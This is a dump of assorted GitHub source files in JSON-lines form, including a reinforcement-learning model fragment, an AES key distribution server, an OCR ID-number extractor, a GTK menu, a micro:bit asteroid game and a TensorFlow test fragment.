Normal(10.0, 1.0)\n # >>> [m.sample() for _ in range(5)]\n # [tensor(10.1613), tensor(11.9001), tensor(9.9001), tensor(10.3850), tensor(8.3563)]\n # >>> m = Normal(10.0, 10.0)\n # >>> [m.sample() for _ in range(5)]\n # [tensor(31.3052), tensor(3.3538), tensor(14.1421), tensor(10.1337), tensor(11.1297)]\n\n # >>> m = Normal(torch.Tensor([10.0,20.0]), torch.Tensor([1.0,10.0]))\n # >>> m.sample()\n # tensor([10.0209, 32.5655])\n dist = Normal(mu, std) # Normal distribution\n return dist, value\n","repo_name":"xiaobanni/plainRL","sub_path":"IL/GAIL/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"23975260512","text":"import socket\r\nimport threading\r\nfrom Crypto.Cipher import AES\r\nfrom Cryptodome.Util.Padding import pad\r\n\r\nfrom Encrypt_Decrypt import *\r\nimport secrets\r\n\r\n# Read the keys from the files\r\nwith open('key_master_a.txt', 'rb') as f:\r\n key_master_a = f.read()\r\n\r\nwith open('key_master_b.txt', 'rb') as f:\r\n key_master_b = f.read()\r\n\r\nclass KeyDistributionServer:\r\n def __init__(self, host, port):\r\n self.host = host\r\n self.port = port\r\n self.users = {}\r\n\r\n @staticmethod\r\n def generate_random_key():\r\n key_length = 16 # 16 bytes (128 bits)\r\n random_bytes = secrets.token_bytes(key_length)\r\n return bytes(random_bytes)\r\n\r\n def encrypt_key(message: bytes, key: bytes) -> bytes:\r\n # Create an AES cipher object with the key and a random initialization vector (IV)\r\n cipher = AES.new(key, AES.MODE_CBC)\r\n iv = cipher.iv\r\n\r\n # Pad the message to make it a multiple of the block size and encode it as bytes\r\n padded_message = pad(message, AES.block_size)\r\n\r\n # Encrypt the padded message\r\n encrypted_message = cipher.encrypt(padded_message)\r\n\r\n # Return the IV and encrypted message\r\n return iv + encrypted_message\r\n\r\n def run(self):\r\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n server_socket.bind((self.host, self.port))\r\n server_socket.listen(5)\r\n print(\"Key Distribution Server started on {}:{}\".format(self.host, self.port))\r\n\r\n while True:\r\n client_socket, client_address = 
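A minimal shape check for the actor-critic module defined above (hypothetical dimensions):

import torch

model = AdvantageActorCritic(input_dim=8, output_dim=2, hidden_dim=64)
dist, value = model(torch.randn(5, 8))
action = dist.sample()                     # (5, 2): one Normal per action dimension
log_prob = dist.log_prob(action).sum(-1)   # joint log-probability per sample
print(action.shape, value.shape, log_prob.shape)  # (5, 2) (5, 1) (5,)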
server_socket.accept()\r\n client_thread = threading.Thread(target=self.handle_client, args=(client_socket, client_address))\r\n client_thread.start()\r\n print(f\"[ACTIVE CONNECTIONS] {threading.active_count() - 1} \\n\")\r\n\r\n def handle_client(self, client_socket, client_address):\r\n print(f\"[NEW CONNECTION] {client_address} connected.\")\r\n\r\n self.handle_key_request(client_socket)\r\n\r\n print(f\"[CONNECTION CLOSING] {client_address} closed.\")\r\n client_socket.close()\r\n def handle_key_request(self, client_socket):\r\n\r\n sessionkey = self.generate_random_key()\r\n\r\n print(f\"Session Key generated is: {sessionkey}\")\r\n\r\n encrypted_session_key_a = encrypt_key(sessionkey, key_master_a)\r\n encrypted_session_key_b = encrypt_key(sessionkey, key_master_b)\r\n\r\n client_socket.send(encrypted_session_key_a)\r\n client_socket.send(encrypted_session_key_b)\r\n\r\n\r\n# Example usage\r\nif __name__ == \"__main__\":\r\n server = KeyDistributionServer('localhost', 5000)\r\n server.run()","repo_name":"mazentarrek/Email-End-to-End-Secure-Encryption-Project","sub_path":"KeyDistributionServer.py","file_name":"KeyDistributionServer.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26394974782","text":"import os\nimport sys\n\nfrom pathlib import Path\n\nsys.path.append(\n os.path.abspath(\n Path(__file__).resolve().parent.parent.parent\n )\n)\n\nimport XHelp as App\n\nclass DBMapper:\n class Settings:\n def get (key):\n if (key in (0, 'all', 'entire',)):\n return (\n 'disappearingMessages',\n 'sessionTimeout',\n )\n elif (key in (1, 'disappearingMessages')):\n return (\n 0\n if (App.Configuration.disappearingMessages == False)\n else 1\n )\n elif (key in (2, 'sessionTimeout')):\n return App.Configuration.sessionTimeout\n \n return None\n \n def update (key, value):\n if (key in (1, 'disappearingMessages')):\n App.Configuration.disappearingMessages = (\n False\n if (int(value) == 0)\n else True\n )\n elif (key in (2, 'sessionTimeout')):\n App.Configuration.sessionTimeout = int(value)\n \n return None\n","repo_name":"Project-K-Official/kavach-help","sub_path":"xhelp/XHelp/database/dBMapper.py","file_name":"dBMapper.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22566607131","text":"from datetime import datetime\nimport os\n\nfrom texttable import Texttable\n\n\n# MODULES_TYPES = {\n# \"scanner\":\"scanner\",\n# \"exploit\":\"exploit\",\n# \"bruteforcer\":\"bruteforcer\"\n# }\n\n# Prints message with current time\ndef time_print(msg, end=\"\\n\"):\n current_time = datetime.strftime(datetime.now(), \"%Y-%m-%d %H:%M:%S\")\n print(\"[%s]\" % current_time, msg, end=end)\n\n\n# Prints message with current time as progress\ndef time_print_progress(msg):\n current_time = datetime.strftime(datetime.now(), \"%Y-%m-%d %H:%M:%S\")\n print(\"\\r[%s] %s\" % (current_time, msg), end=\"\")\n\n\n# Clears screen\ndef clear_screen():\n func = \"cls\" if os.name == \"nt\" else \"clear\"\n os.system(func)\n\n\n# Returns modules table for printing\ndef get_modules_search_table(search_term, _map):\n table = Texttable()\n # _map = get_modules_map()\n all_rows = []\n all_rows.append([\"Id\", \"Type\", \"Name\", \"Description\"])\n for v in _map:\n tmp_name = v['use_name']\n tmp_type = v['handle'].__info__[\"type\"]\n tmp_description = v['handle'].__info__[\"description\"]\n tmp_id = v['id']\n if 
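The server above wraps the session key with AES-CBC and prepends the 16-byte IV. A client-side unwrap sketch under that assumption (the real decrypt presumably lives in the record's Encrypt_Decrypt module, which is not shown):

from Crypto.Cipher import AES
from Cryptodome.Util.Padding import unpad

def decrypt_key(blob: bytes, key: bytes) -> bytes:
    """Inverse of encrypt_key: split off the IV, decrypt, strip PKCS#7 padding."""
    iv, ciphertext = blob[:16], blob[16:]
    cipher = AES.new(key, AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(ciphertext), AES.block_size)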
search_term in tmp_name:\n all_rows.append(\n [tmp_id, tmp_type, tmp_name, tmp_description]\n )\n # import pdb; pdb.set_trace()\n table.add_rows(all_rows)\n if len(all_rows) > 1:\n ret = table.draw() + \"\\n\"\n else:\n ret = \"No results for: %s\" % search_term\n return ret\n\n\n# returns banner\ndef get_banner():\n banner = \"\"\"\n\n noname\n\n \"\"\"\n return banner\n","repo_name":"rolzwy7/stack","sub_path":"_dropped/utils/print_utils.py","file_name":"print_utils.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"48254627544","text":"import streamlit as st\nimport cv2\nimport pytesseract\nimport tempfile\nimport os\nimport numpy as np\nfrom sklearn.svm import SVC\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph\nfrom reportlab.lib.styles import getSampleStyleSheet\nimport re\nimport pandas as pd\n\n# Set the path to the Tesseract executable\npytesseract.pytesseract.tesseract_cmd = 'C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe'\n\n# Sample data for training the SVM model (you need to replace this with your labeled data)\ndata = [\n {\"text\": \"1234567890\", \"label\": \"identification_number\"},\n {\"text\": \"DL No. : ABC1234567 1234\", \"label\": \"identification_number\"},\n {\"text\": \"Aadhar Card No. 123456789012\", \"label\": \"identification_number\"},\n {\"text\": \"PAN Card No. ABCDE1234F\", \"label\": \"identification_number\"},\n {\"text\": \"Voter ID No. ABCDE1234F\", \"label\": \"identification_number\"},\n {\"text\": \"Passport No. P12345678\", \"label\": \"identification_number\"},\n {\"text\": \"GSTIN No. 12ABCDE3456F7G8\", \"label\": \"identification_number\"},\n {\"text\": \"EPIC No. ABCDE1234F\", \"label\": \"identification_number\"},\n {\"text\": \"IFSC Code: ABCD1234567\", \"label\": \"identification_number\"},\n {\"text\": \"MICR Code: 123456789\", \"label\": \"identification_number\"},\n {\"text\": \"UPC Code: 0A1B2C3D\", \"label\": \"identification_number\"},\n {\"text\": \"ESIC No. 1234567890\", \"label\": \"identification_number\"},\n {\"text\": \"TIN No. AB123456789012\", \"label\": \"identification_number\"},\n {\"text\": \"UAN No. 123456789012\", \"label\": \"identification_number\"},\n {\"text\": \"IMEI No. 123456789012345\", \"label\": \"identification_number\"},\n {\"text\": \"SIM No. 12345678901234567890\", \"label\": \"identification_number\"},\n {\"text\": \"Patent No. 315456\", \"label\": \"patent_number\"},\n {\"text\": \"WHI7595242\", \"label\": \"election_number\"},\n {\"text\": \"Certificate No. 
IN-at78944260000018\", \"label\": \"certificate_number\"},\n {\"text\": \"Certcate No IN-at78944260000018\", \"label\": \"certificate_number\"}, # Example certificate number\n # Add more labeled examples here\n]\n\n# Convert the labeled data into a DataFrame\ndf = pd.DataFrame(data)\n\n# Split the data into training and testing sets\nX_train, X_test, y_train, y_test = train_test_split(df[\"text\"], df[\"label\"], test_size=0.2, random_state=42)\n\n# Create TF-IDF vectors from the text data\nvectorizer = TfidfVectorizer()\nX_train_tfidf = vectorizer.fit_transform(X_train)\nX_test_tfidf = vectorizer.transform(X_test)\n\n# Train an SVM classifier\nsvm_classifier = SVC(kernel=\"linear\")\nsvm_classifier.fit(X_train_tfidf, y_train)\n\n# Define regular expression patterns for identification numbers using RE2\nidentification_patterns = [\n # Patterns for unique identification numbers\n r'\\b\\d{10}\\b', # Matches 10-digit numbers\n r'DL No\\. : [A-Z0-9]+\\s\\d{4,}', # DL No. : \n r'Civil Case No\\. \\d{4}/\\d{4}', # Civil Case No. 1234/5678\n r'VA-\\d+', # VA-123\n r'Aff-\\d+', # Aff-456\n r'APL-\\d+', # APL-789\n r'Evidence ID-\\d+', # Evidence ID-987\n r'Witness ID-[A-Z]\\d+', # Witness ID-A123\n r'Order No\\. \\d{3}/\\d{4}', # Order No. 123/5678\n r'BB-\\d{4}-\\d{3}', # BB-1234-567\n r'CS-\\d{4}-\\d{3}', # CS-1234-567\n r'CD-\\d+', # CD-123\n r'MP-\\d{4}-\\d{3}', # MP-1234-567\n r'CA-\\d{4}-\\d{3}', # CA-1234-567\n r'ER-\\d{4}-\\d{3}', # ER-1234-567\n r'PIL No\\. \\d{3}/\\d{4}', # PIL No. 123/5678\n r'Motion No\\. [A-Z]{2}-\\d{3}', # Motion No. AB-123\n r'Adjournment Application - AA-\\d{4}-\\d{3}', # Adjournment Application - AA-1234-567\n r'EA-\\d{4}-\\d{3}', # EA-1234-567\n r'LN-\\d{4}-\\d{3}', # LN-1234-567\n r'SA-\\d{4}-\\d{3}', # SA-1234-567\n r'RA-\\d{4}-\\d{3}', # RA-1234-567\n r'CC-\\d{4}-\\d{3}', # CC-1234-567\n r'MA-\\d{4}-\\d{3}', # MA-1234-567\n r'Patent No\\. \\d+', # Matches \"Patent No. 315456\" format\n r'Certificate No\\. [A-Z0-9-]+', # Matches \"Certificate No.\" followed by alphanumeric characters and hyphens\n r'Certcate No\\. IN-at78944260000018', # Matches the specific certificate number\n # Patterns for other court-related identifiers and information\n r'Case No\\. [A-Z0-9]+\\s\\d{4,}', # Case No. XYZ 1234\n r'Suit No\\. \\d{4}/\\d{4}', # Suit No. 1234/5678\n r'Writ Petition No\\. \\d{4}/\\d{4}', # Writ Petition No. 1234/5678\n r'Criminal Case No\\. [A-Z]+\\s\\d{4}',# Criminal Case No. ABC 1234\n r'Appeal No\\. \\d+', # Appeal No. 123\n r'Revision Petition No\\. [A-Z]+\\s\\d{4}', # Revision Petition No. DEF 1234\n r'ID [A-Z0-9]+\\s\\d{10}', # ID ABC1234567 1234567890\n r'Adhar Card No\\. \\d{12}', # Adhar Card No. 123456789012\n r'Permanent Account Number Card\\. [A-Z]{5}\\d{4}[A-Z]',# PAN Card No.ABCDE1234F\n r'FIR No\\. [A-Z]{3}/\\d{3}/\\d{4}', # FIR No. XYZ/123/2023\n r'Complaint No\\. \\d{4}/\\d{4}', # Complaint No. 1234/5678\n r'Suit for Declaration', # Suit for Declaration\n r'Petition for Divorce', # Petition for Divorce\n r'Ruling in Case No\\. [A-Z0-9]+\\s\\d{4,}', # Ruling in Case No. XYZ 1234\n r'Order of [A-Z]+\\sCourt', # Order of High Court\n # r'Judgment dated \\d{2}/\\d{2}/\\d{4}', # Judgment dated 01/12/2023\n # r'\\d{2}/\\d{2}/\\d{4}', # Date in DD/MM/YYYY format\n # r'\\d{1,2}-\\d{1,2}-\\d{4}', # Date in D-M-YYYY format\n r'Registered Office: [A-Za-z\\s]+', # Registered Office: ABC Law Firm\n r'Advocate [A-Za-z\\s]+', # Advocate Mr. John Doe\n # Patterns for Indian government document identification numbers\n r'Aadhar Card No\\. 
\\d{12}', # Aadhar Card No. 123456789012 (12-digit)\n r'PAN Card No\\. [A-Z]{5}\\d{4}[A-Z]', # PAN Card No. ABCDE1234F\n r'Voter ID No\\. [A-Z0-9]{10}', # Voter ID No. ABCDE1234F\n r'Passport No\\. [A-Z0-9]+\\d+', # Passport No. P12345678 (Alphanumeric)\n r'GSTIN No\\. [0-9A-Z]{15}', # GSTIN No. 12ABCDE3456F7G8 (15-character)\n r'EPIC No\\. [A-Z0-9]{10}', # EPIC No. ABCDE1234F (10-character)\n r'IFSC Code: [A-Z]{4}\\d{7}', # IFSC Code: ABCD1234567\n r'MICR Code: \\d{9}', # MICR Code: 123456789\n r'UPC Code: [0-9A-F]+', # UPC Code: 0A1B2C3D\n r'ESIC No\\. \\d{10}', # ESIC No. 1234567890 (10-digit)\n r'TIN No\\. [A-Z]{2}\\d{11}', # TIN No. AB123456789012 (13-character)\n r'UAN No\\. \\d{12}', # UAN No. 123456789012 (12-digit)\n r'IMEI No\\. \\d{15}', # IMEI No. 123456789012345 (15-digit)\n r'SIM No\\. \\d{20}', # SIM No. 12345678901234567890 (20-digit)\n # r'[A-Z0-9]{9}', # Matches 9-character alphanumeric election numbers remember it\n# Add more patterns as needed\n \n\n]\n\ndef classify_text_segments(text_segments):\n classified_segments = []\n for text_segment in text_segments:\n tfidf_vector = vectorizer.transform([text_segment])\n classification = svm_classifier.predict(tfidf_vector)[0]\n classified_segments.append({\"text\": text_segment, \"classification\": classification})\n return classified_segments\n\ndef extract_identification_numbers(img_path):\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n custom_config = r'--oem 3 --psm 6'\n detected_text = pytesseract.image_to_string(img, config=custom_config)\n\n # Extract text using regular expressions\n extracted_text = \"\"\n for pattern in identification_patterns:\n identification_numbers = re.findall(pattern, detected_text)\n extracted_text += \"\\n\".join(identification_numbers) + \"\\n\"\n\n # Classify each extracted text segment using the SVM classifier\n classified_identification_numbers = classify_text_segments(identification_numbers)\n\n return detected_text, extracted_text, classified_identification_numbers\n\ndef main():\n st.title(\"Text and Identification Number Extractor with Patterns\")\n\n uploaded_image = st.file_uploader(\"Upload an image...\", type=[\"jpg\", \"jpeg\", \"png\"])\n\n if uploaded_image:\n st.image(uploaded_image, caption=\"Uploaded Image\", use_column_width=True)\n st.write(\"Extracted Text:\")\n st.write(\"Please wait while we process the image...\")\n\n # Save the uploaded image to a temporary file\n temp_img = tempfile.NamedTemporaryFile(delete=False, suffix=\".png\")\n temp_img.write(uploaded_image.read())\n temp_img_path = temp_img.name\n\n # Close the temporary file to release the resource\n temp_img.close()\n\n # Extract text, patterns, and classify identification numbers when the user uploads an image\n text, extracted_text, classified_identification_numbers = extract_identification_numbers(temp_img_path)\n\n # Display the extracted text\n st.write(text)\n\n # Display the extracted identification numbers\n st.write(\"Extracted Identification Numbers:\")\n st.write(extracted_text)\n\n # Display the classified identification numbers\n st.write(\"Classified Identification Numbers:\")\n for i, segment in enumerate(classified_identification_numbers, 1):\n st.write(f\"{i}. 
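Note that the extractor above rebinds identification_numbers on every loop pass, so only the final pattern's matches reach the classifier. A variant that pools matches across all patterns before classifying (relies on the same imports and helpers as the file above):

def extract_identification_numbers_pooled(img_path):
    img = cv2.imread(img_path)
    img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
    detected_text = pytesseract.image_to_string(img, config=r'--oem 3 --psm 6')

    # pool matches from every pattern before classification
    all_matches = []
    for pattern in identification_patterns:
        all_matches.extend(re.findall(pattern, detected_text))

    extracted_text = "\n".join(all_matches)
    return detected_text, extracted_text, classify_text_segments(all_matches)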
Text: {segment['text']}, Classification: {segment['classification']}\")\n\n        # Create a button to download the extracted text and classified numbers as a PDF file\n        if st.button(\"Download as PDF\"):\n            pdf_filename = \"extracted_data.pdf\"\n            doc = SimpleDocTemplate(pdf_filename, pagesize=letter)\n            styles = getSampleStyleSheet()\n            style = styles[\"Normal\"]\n            elements = []\n\n            # Add detected sentences to the PDF\n            sentences = text.split('\\n\\n')\n            for sentence in sentences:\n                p = Paragraph(sentence, style)\n                elements.append(p)\n\n            # Add classified identification numbers to the PDF\n            for segment in classified_identification_numbers:\n                p = Paragraph(f\"Text: {segment['text']}, Classification: {segment['classification']}\", style)\n                elements.append(p)\n\n            doc.build(elements)\n            st.success(f\"[Download PDF]({pdf_filename})\")\n\n        # Remove the temporary image file after closing it\n        os.remove(temp_img_path)\n\nif __name__ == \"__main__\":\n    main()","repo_name":"ShubhamS2003/orcBlockchain","sub_path":"svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":10646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} {"seq_id":"22701556355","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#This class represents the main User Interface.\n#It gives the options to search, view currently online streams\n#and to view favourites\n\nimport gtk,webkit,streamViewer,sys,searchBox,search,onlineStreams,favourites\t\n\t\nclass Options():\n\tdef __init__(self):\n\t\n\t\t#Setup the main window\n\t\tself.options = gtk.Window()\n\t\tself.options.set_position(gtk.WIN_POS_CENTER)\n\t\tself.options.set_title('Dual Craft')\n\t\tself.options.set_default_size(500,500)\n\t\tself.options.connect('destroy', lambda w: gtk.main_quit())\n\t\tself.b1 = gtk.VBox()\n\t\tself.options.add(self.b1)\n\t\tself.options.set_default_size(500,500)\n\n\t\t#Create buttons\n\t\tself.button1 = gtk.Button(\"Search\")\n\t\tself.button2 = gtk.Button(\"Online\")\n\t\tself.button3 = gtk.Button('Favourites')\n\n\t\t#Add buttons to the main window\n\t\tself.b1.pack_start(self.button1)\n\t\tself.b1.pack_start(self.button2)\n\t\tself.b1.pack_start(self.button3)\n\t\n\t\t#Set onClick actions\n\t\tself.button1.connect('clicked', self.showSearchWindow)\n\t\tself.button2.connect('clicked', self.showOnline)\n\t\tself.button3.connect('clicked', self.showFavouritesWindow)\n\n\t\t#Show the window\n\t\tself.options.show_all()\n\t\tgtk.main()\n\n\t#Display a search window\n\tdef showSearchWindow(self, object):\n\t\ttest = searchBox.Main()\n\t\n\t#Display category and sub-category options for currently online streams\n\tdef showOnline(self, object):\n\t\ts = onlineStreams.streamTypeChoice()\n\t\n\t#Show the users favourites\n\tdef showFavouritesWindow(self,object):\n\t\tf = favourites.Favourites()\n\t\tf.showAll()\n\t\t\n\nif __name__ == '__main__':\n\tOptions()\n","repo_name":"YYZ/StreamViewer","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} {"seq_id":"660212837","text":"import mindspore.common.dtype as mstype\nimport mindspore.dataset.engine as de\n\nimport mindspore.dataset.vision as C\nimport mindspore.dataset.transforms as C2\n\ndef create_dataset(dataset_path, do_train, repeat_num=1, batch_size=32):\n\n    ds = de.Cifar10Dataset(dataset_path, 
num_parallel_workers=4, shuffle=True)\n\n\n rescale = 1.0 / 255.0\n shift = 0.0\n\n # define map operations\n random_crop_op = C.RandomCrop((32, 32), (4, 4, 4, 4))\n random_horizontal_flip_op = C.RandomHorizontalFlip()\n\n rescale_op = C.Rescale(rescale, shift)\n change_swap_op = C.HWC2CHW()\n\n trans = []\n if do_train:\n trans += [random_crop_op, random_horizontal_flip_op]\n\n trans += [rescale_op, change_swap_op]\n\n type_cast_op = C2.TypeCast(mstype.int32)\n\n ds = ds.map(input_columns=\"label\", operations=type_cast_op)\n ds = ds.map(input_columns=\"image\", operations=trans)\n\n # apply shuffle operations\n ds = ds.shuffle(buffer_size=100)\n\n # apply batch operations\n ds = ds.batch(batch_size, drop_remainder=True)\n\n # apply dataset repeat operation\n ds = ds.repeat(repeat_num)\n\n return ds","repo_name":"Shuijing2018/CwR_Mindspore","sub_path":"utils_data.py","file_name":"utils_data.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16916455719","text":"# Name: Starbit Commander II\n# Coder: Marco Janssen (twitter @marc0janssen)\n# stardate: 2021-04-07\n# version: 1.0.4\n# notes: Explosion code borrowed with permission from Derek Graham.\n# notes: https://deejaygraham.github.io/2016/10/28/tiny-asteroids-for-microbit/\n# notes: All other code is my own.\n# notes: This code will only run on v2 versions of the microbit\n\n\nfrom microbit import display, button_a, button_b, sleep\nfrom random import randint, randrange\n\n\nclass Game:\n def __init__(self):\n self.screenMinX, self.screenMinY = 0, 0\n self.screenMaxX, self.screenMaxY = 4, 4\n self.brightnessMin, self.brightnessMax = 0, 9\n self.score = 0\n self.frameRate = 1000\n self.chanceSecondAstroid = 15\n self.scoreBonus = 1\n self.ticks = 0\n self.rowOfAstroids = 2\n\n def gameOver(self):\n spaceShip.blowUpShip()\n sleep(300)\n display.scroll(\"Game Over\")\n sleep(300)\n display.scroll(\"Score : \" + str(self.score))\n sleep(500)\n display.scroll(\"Marco Janssen (c)2021\", delay=50)\n\n def countScore(self):\n self.score += self.scoreBonus\n\n def increaseDifficulty(self):\n if self.ticks % 10 == 0:\n self.frameRate = max(self.frameRate - 100, 400)\n self.scoreBonus += 1\n\n if self.ticks % 15 == 0:\n self.chanceSecondAstroid = max(self.chanceSecondAstroid - 2, 3)\n self.scoreBonus += 3\n\n if self.ticks % 25 == 0:\n self.rowOfAstroids = min(self.rowOfAstroids + 1, 5)\n self.scoreBonus += 5\n\n def gameStart(self):\n\n display.scroll(\"3... 2... 1... 
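Hypothetical usage of the pipeline above (the path must point at the CIFAR-10 binary files; iterator details can vary slightly across MindSpore versions):

train_ds = create_dataset("./cifar-10-batches-bin", do_train=True, batch_size=32)
for batch in train_ds.create_dict_iterator():
    print(batch["image"].shape, batch["label"].shape)  # (32, 3, 32, 32) (32,)
    break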
Launch...\", delay=70)\n\n while True:\n astroidField.createAstroid()\n\n astroidField.drawAstroids()\n spaceShip.draw()\n\n if spaceShip.collide():\n self.gameOver()\n break\n\n sleep(self.frameRate)\n\n astroidField.hideAstroids()\n spaceShip.hide()\n\n if button_a.was_pressed():\n spaceShip.moveLeft()\n elif button_b.was_pressed():\n spaceShip.moveRight()\n\n astroidField.moveAstroids()\n astroidField.clearPassedAstroids()\n self.increaseDifficulty()\n\n\nclass Spaceship:\n def __init__(self):\n self.properties = [2, game.screenMaxY, game.brightnessMax]\n\n def moveLeft(self):\n self.properties[0] = max(self.properties[0] - 1, game.screenMinX)\n\n def moveRight(self):\n self.properties[0] = min(self.properties[0] + 1, game.screenMaxX)\n\n def draw(self):\n display.set_pixel(\n self.properties[0], self.properties[1], self.properties[2])\n\n def hide(self):\n display.set_pixel(\n self.properties[0], self.properties[1], game.brightnessMin)\n\n def collide(self):\n for astroid in astroidField.astroidField:\n if (\n astroid.properties[0] == self.properties[0]\n and astroid.properties[1] == self.properties[1]\n ):\n return True\n return False\n\n def blowUpShip(self):\n self.hide()\n\n self.drawExplosion(self.properties[2], 1)\n sleep(200)\n display.clear()\n\n for brightness in range(self.properties[2], 0, -1):\n self.drawExplosion(brightness, 2)\n sleep(200)\n display.clear()\n\n def drawExplosion(self, brightness, radius):\n x = self.properties[0]\n y = self.properties[1]\n left_of_centre = x - radius\n right_of_centre = x + radius\n above_centre = y - radius\n\n if left_of_centre >= game.screenMinX:\n display.set_pixel(left_of_centre, y, brightness)\n display.set_pixel(left_of_centre, above_centre, brightness)\n\n display.set_pixel(x, above_centre, brightness)\n\n if right_of_centre <= game.screenMaxX:\n display.set_pixel(right_of_centre, y, brightness)\n display.set_pixel(right_of_centre, above_centre, brightness)\n\n\nclass Astroid:\n def __init__(self):\n self.properties = [0, 0, 0]\n self.properties[0] = randint(game.screenMinX, game.screenMaxX)\n self.properties[2] = randint(\n game.brightnessMin + 1, game.brightnessMax - 3\n )\n\n def draw(self):\n display.set_pixel(\n self.properties[0], self.properties[1], self.properties[2])\n\n def hide(self):\n display.set_pixel(\n self.properties[0], self.properties[1], game.brightnessMin)\n\n def move(self):\n self.properties[1] = min(self.properties[1] + 1, game.screenMaxY + 1)\n\n\nclass AstroidField:\n def __init__(self):\n self.astroidField = []\n\n def drawAstroids(self):\n for astroid in self.astroidField:\n astroid.draw()\n\n def moveAstroids(self):\n for astroid in self.astroidField:\n astroid.move()\n\n game.ticks += 1\n\n def clearPassedAstroids(self):\n for astroid in self.astroidField:\n if self.astroidField[0].properties[1] > game.screenMaxY:\n self.astroidField.pop(0)\n game.countScore()\n\n def hideAstroids(self):\n for astroid in self.astroidField:\n astroid.hide()\n\n def createAstroid(self):\n if not game.ticks % game.rowOfAstroids == 0:\n astroid = Astroid()\n self.astroidField.append(astroid)\n xPosFirstAstroid = astroid.properties[0]\n\n chance = randrange(game.chanceSecondAstroid)\n astroid = Astroid()\n if xPosFirstAstroid != astroid.properties[0] and chance == 0:\n self.astroidField.append(astroid)\n else:\n astroid = None\n del astroid\n\n\ngame = Game()\nspaceShip = Spaceship()\nastroidField = AstroidField()\n\ngame.gameStart()\n\nastroidField = None\nspaceShip = None\ngame = 
None\n","repo_name":"marc0janssen/Starbit-Commander-II","sub_path":"Starbit Commander II.py","file_name":"Starbit Commander II.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44767203940","text":"#!/bin/python3\n\nimport sys\n\ndef dayOfTheProgrammer(year):\n mon7 = 215\n feb = 0#days in february\n if(year < 1918): #julian\n feb = 28 if year%4>0 else 29\n elif(year > 1918): #gregorian\n feb = 29 if (not (year%400 >0)) or year%100>0 and (not(year%4>0)) else 28\n else: #1918\n feb = 15\n feb = 256 - (feb + mon7)\n return str(feb) + \".09.\" + str(year)\n\nyear = int(input().strip())\nresult = dayOfTheProgrammer(year)\nprint(result)\n","repo_name":"Lintik/hackerrank","sub_path":"Core CS/Algorithms/Implementation/Day of the Programmer/dayOfTheProgammer.py3","file_name":"dayOfTheProgammer.py3","file_ext":"py3","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"31"} +{"seq_id":"36894967362","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport json\nimport os\nimport signal\nimport sys\nimport tempfile\nimport threading\nfrom absl.testing import parameterized\nfrom tensorflow.python.distribute import collective_all_reduce_strategy as collective_strategy\nfrom tensorflow.python.distribute import combinations\nfrom tensorflow.python.distribute import distribute_coordinator as dc\nfrom tensorflow.python.distribute import mirrored_strategy\nfrom tensorflow.python.distribute import multi_worker_test_base as test_base\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras import callbacks\nfrom tensorflow.python.keras.distribute import multi_worker_testing_utils\nfrom tensorflow.python.keras.distribute import multi_worker_training_state as training_state\nfrom tensorflow.python.platform import test\n\n\ndef get_strategy_object(strategy_cls):\n if strategy_cls == mirrored_strategy.MirroredStrategy:\n return strategy_cls(mirrored_strategy.all_local_devices())\n else:\n # CollectiveAllReduceStrategy and ParameterServerStrategy.\n return strategy_cls()\n\n\nclass KerasMultiWorkerFaultToleranceTest(test_base.IndependentWorkerTestBase,\n parameterized.TestCase):\n\n class PreemptionAtBatchBoundarySimulatingCallback(callbacks.Callback):\n \"\"\"Callback to simulate preemtion at batch boundary.\"\"\"\n\n def on_epoch_begin(self, epoch, logs=None):\n self._current_epoch = epoch\n\n def on_batch_begin(self, batch, logs=None):\n if self._current_epoch == 1 and batch == 1 and not test_base.is_chief():\n # Simulate preemtion at the start of second batch of second epoch.\n raise RuntimeError('Preemption!')\n\n def on_batch_end(self, batch, logs=None):\n assert self._current_epoch < 1 or batch < 1\n\n def on_epoch_end(self, epoch, logs=None):\n assert epoch < 1\n\n # TODO(rchao): Add tests for checking 0th and 2nd epoch boundary.\n class PreemptionAtEpochBoundarySimulatingCallback(callbacks.Callback):\n \"\"\"Callback to simulate preemtion at epoch boundary.\"\"\"\n\n def on_epoch_begin(self, epoch, logs=None):\n if epoch == 1 and not test_base.is_chief():\n # Simulate preemtion at the start of second epoch.\n raise RuntimeError('Preemption!')\n\n def on_epoch_end(self, epoch, logs=None):\n assert epoch < 1\n\n @combinations.generate(\n combinations.combine(\n # Eager runtime unfortunately cannot be tested with multi-threading.\n # TODO(rchao): 
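A few spot checks for the calendar logic above; each value follows directly from the function's day counts:

assert dayOfTheProgrammer(2016) == "12.09.2016"  # Gregorian leap year
assert dayOfTheProgrammer(2017) == "13.09.2017"  # Gregorian common year
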